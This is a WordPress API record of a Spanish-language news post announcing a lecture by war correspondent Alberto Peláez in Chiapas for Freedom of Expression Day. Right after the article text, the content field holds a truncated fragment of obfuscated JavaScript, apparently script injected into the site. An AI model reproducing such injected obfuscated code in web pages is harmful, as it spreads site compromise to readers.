{"id":11780,"date":"2023-09-12T04:36:38","date_gmt":"2023-09-12T04:36:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11780"},"modified":"2023-09-12T04:36:38","modified_gmt":"2023-09-12T04:36:38","slug":"corresponsal-de-guerra-visitara-el-estado-de-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11780","title":{"rendered":"Corresponsal de guerra visitar\u00e1 el estado de Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1694493342489-1024x768.jpg\" alt=\"\" class=\"wp-image-11781\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1694493342489-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1694493342489-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1694493342489-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1694493342489.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. 11 de septiembre del 2023. El Patronato Ciudadano Bicentenario de Chiapas, anunci\u00f3 que el periodista internacional, Alberto Pel\u00e1ez dar\u00e1 una conferencia magistral en el marco de la conmemoraci\u00f3n del D\u00eda de la Libertad de Expresi\u00f3n.As\u00ed lo dio a conocer el presidente del Patronato, Enoc Hern\u00e1ndez Cruz, extern\u00f3 que est\u00e1 destinada a quienes se dedican al periodismo en Chiapas y se llevar\u00e1 a cabo el lunes 9 de octubre a las 11 de la ma\u00f1ana en el auditorio al aire libre de la Universidad Valle del Grijalba (UVG).Subray\u00f3 la importancia del evento al ser, Alberto Pel\u00e1ez de nacionalidad espa\u00f1ola, un importante referente del periodismo internacional, con hechos notables como su participaci\u00f3n en la corresponsal\u00eda en lugares de conflicto en el mundo, particularmente con su trabajo como periodista en la Guerra del Golfo P\u00e9rsico y en Afganist\u00e1n.\u201cLo vamos a tener en la conmemoraci\u00f3n del d\u00eda de la Libertad Expresi\u00f3n, que es el 7 de octubre cuando se conmemora el asesinato de don Belisario Dom\u00ednguez Palencia, pero como cae en s\u00e1bado y queremos que esto sea para periodistas en activo y estudiantes del periodismo, decidimos posponerlo al lunes\u201d, aclar\u00f3.Hern\u00e1ndez Cruz, adelant\u00f3 que el patronato se encuentra organizando diversos eventos para conmemorar la anexi\u00f3n de Chiapas a M\u00e9xico; por lo cual hizo un llamado a estar pendientes a pr\u00f3ximas actividades, dentro de las que se encuentra la presentaci\u00f3n de libros de investigaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 11 de septiembre del 2023. El Patronato Ciudadano Bicentenario de Chiapas, anunci\u00f3 que el periodista internacional, Alberto Pel\u00e1ez dar\u00e1 una conferencia magistral en el marco de la conmemoraci\u00f3n del D\u00eda de la Libertad de Expresi\u00f3n.As\u00ed lo dio a conocer el presidente del Patronato, Enoc Hern\u00e1ndez Cruz, extern\u00f3 que est\u00e1 destinada a quienes se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11781,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11780","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11780","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11780"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11780\/revisions"}],"predecessor-version":[{"id":11782,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11780\/revisions\/11782"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11781"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11780"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11780"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11780"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}